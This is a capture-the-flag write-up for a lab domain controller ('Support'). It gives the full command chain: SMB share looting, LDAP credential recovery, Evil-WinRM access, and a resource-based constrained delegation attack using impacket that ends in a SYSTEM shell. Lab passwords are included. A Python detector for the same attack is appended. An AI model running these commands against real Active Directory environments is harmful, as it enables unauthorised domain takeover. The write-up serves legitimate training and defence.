Ping

Nmap Scans

Nmap Default Scan

Nmap Script and Service Scan

Nmap All Port Scan

DNS Info

dig axfr @10.10.11.174 support.htb any

Added to my hosts file

Can see SMB Shares

smbclient -U '' -L \\\\10.10.11.174\\\\

Share support-tools

smbclient -N //10.10.11.174/support-tools

Downloaded all files to my Kali

recurse ON
prompt off
mget *

Decompiled the userinfo.exe file and found an encrypted password, then decrypted it and did an LDAP search

ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | tee ldapsearch.log

Found support’s password

Will use Evil-WinRM to get a session as support

evil-winrm -u support -p Ironside47pleasure40Watchful -i support.htb

I can add machines

Will add computer

impacket-addcomputer support.htb/support -dc-ip 10.10.11.174 -computer-name 'pwned$' -computer-pass 'pwned'

Set delegation rights to new computer

impacket-rbcd -action write -delegate-from pwned$ -delegate-to dc$ -dc-ip 10.10.11.174 "support.htb/support:Ironside47pleasure40Watchful"

TGT ticket to impersonate DC Admin

impacket-getST -spn cifs/dc.support.htb support/pwned\$:'pwned' -impersonate Administrator -dc-ip 10.10.11.174 

Will export the ticket to local

export KRB5CCNAME=./Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

Get a shell as NT AUTHORITY\SYSTEM

impacket-psexec -k -no-pass dc.support.htb -dc-ip 10.10.11.174
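
The machine-account and delegation steps above leave a trail in the domain controller's Security log. As an added example (not part of the original write-up), this Python correlates event 4741 (computer account created) with event 5136 (directory object modified) writing msDS-AllowedToActOnBehalfOfOtherIdentity by the same account. The event dicts are simplified, constructed samples; the field names follow the Windows event schema, and the 24-hour window and the `adm-join` allowlist entry are assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
WINDOW = timedelta(hours=24)  # assumed correlation window

# Constructed sample events (simplified; timestamps and DNs are made up).
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2024-01-10T09:00:05", "SubjectUserName": "support",
     "TargetUserName": "pwned$"},
    {"id": 5136, "time": "2024-01-10T09:01:40", "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"id": 4741, "time": "2024-01-10T10:00:00", "SubjectUserName": "adm-join",
     "TargetUserName": "WS042$"},
    {"id": 5136, "time": "2024-01-10T11:00:00", "SubjectUserName": "adm-join",
     "ObjectDN": "CN=WS042,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description"},
]

def find_rbcd_abuse(events, join_allowlist=frozenset()):
    """Return one alert per write to the RBCD attribute, noting any computer
    accounts the same subject created within WINDOW before the write."""
    allow = {name.lower() for name in join_allowlist}
    created = {}  # subject -> [(time, new computer account name)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        subject = ev["SubjectUserName"].lower()
        if ev["id"] == 4741 and subject not in allow:
            created.setdefault(subject, []).append((when, ev["TargetUserName"]))
        elif ev["id"] == 5136 and ev["AttributeLDAPDisplayName"].lower() == RBCD_ATTR:
            recent = [n for t, n in created.get(subject, []) if when - t <= WINDOW]
            alerts.append({
                "subject": subject,
                "target": ev["ObjectDN"],
                "new_computers": recent,
                # Every RBCD write deserves review; a machine join by the
                # same non-allowlisted account just before it raises severity.
                "severity": "high" if recent else "medium",
            })
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_abuse(SAMPLE_EVENTS, join_allowlist={"adm-join"}):
        print(alert)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled on the domain controllers. Setting ms-DS-MachineAccountQuota to 0 stops ordinary users from creating the computer account in the first place.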

User.txt

Root.txt

Done with Support…:)